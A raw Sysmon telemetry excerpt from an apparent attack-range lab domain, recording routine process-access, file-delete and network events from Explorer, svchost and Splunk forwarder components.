10341000x80000000000000001047352Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:19.124{466BC892-32D3-60E8-770B-00000000CF01}63569744C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047351Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:19.108{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047350Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:19.108{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047349Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:19.108{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047348Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:19.108{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000806807Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:20.801{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=019C2759F309C7889D8350A8E4DA618B,SHA256=1E318FD1585A4AF34A344352B90778B5D378618CD42296838398557E39A1D244,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047357Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:20.839{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=87410BF8276CBE5100955B1DBACC0E04,SHA256=BB85B74C2A83DC1B919D3952D29689B4F29F3E90840F15AABED136790BD20675,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806806Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:20.395{0C1E0330-050B-60E8-9B00-00000000D001}1020NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047358Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:21.859{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=44B3097C93B951DFC516D134AC44F31A,SHA256=722396C50DF61377DF06A618FF40F01A3BD943CC91D042918D63B1E7F4FAAE13,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806808Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:21.848{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9716349857DE28B92F7977A76464F35B,SHA256=5C6E9491037C0937953F53359B0286A1BAB4C90CCBBAE0EC99FCC4A9F33F4988,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047359Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:22.874{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D9F08B6D0F0AD4C3B9FFF240846744F,SHA256=336C6747043C909CEADAA45764FD5EAB4E357DA248D271F7CA3FD11A8E626998,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806810Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:22.864{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5BD9F9196AFC35659193DF3CB8A31926,SHA256=969046DE2C79AE1C0D30655043D69959020A56BAE17130D7E84AD8E0FD7C0FCA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806809Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:20.527{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57213-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000806812Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:23.910{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D82CFA3BC15E8CDB8E7BFF8613C158FC,SHA256=08134B9CAF28EB8620479A1D4E56F071953B23ACC09F8735525847CD0A7C1D2F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047360Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:23.889{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7723D08F9FA944D2B164FF6447D9B7C2,SHA256=8B36C7F7FC6E133C4988B3DE0BB8817D91DF2F3E24D16C65104F0E6BD5BB0CCF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806811Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:22.355{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57214-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806840Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:24.926{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08321C6760320410A9E93A89752FE2F6,SHA256=E131187ADA0A027E4AEAD51E9D1D5027E46C91CE6E18995DAF0E561662C66DE3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000806839Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:24.926{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F3C8-60EB-5879-00000000D001}3196C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806838Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:24.926{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806837Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:24.926{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806836Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:24.926{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806835Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:24.926{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806834Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:24.926{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806833Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:24.926{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806832Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:24.926{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806831Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:24.926{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806830Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:24.926{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806829Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:24.926{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F3C8-60EB-5879-00000000D001}3196C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806828Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:24.926{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F3C8-60EB-5879-00000000D001}3196C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806827Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:24.911{0C1E0330-F3C8-60EB-5879-00000000D001}3196C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001047361Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:24.904{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FD479EAD2C08A9BD1D04CEB8714EF0F3,SHA256=EBC42ABF7A372B097DE734537A196C7504B4A6B4BA65015ACC01AA4D2B8D6D13,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000806826Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:24.426{0C1E0330-F3C8-60EB-5779-00000000D001}3523512C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806825Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:24.254{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F3C8-60EB-5779-00000000D001}352C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806824Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:24.238{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806823Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:24.238{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806822Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 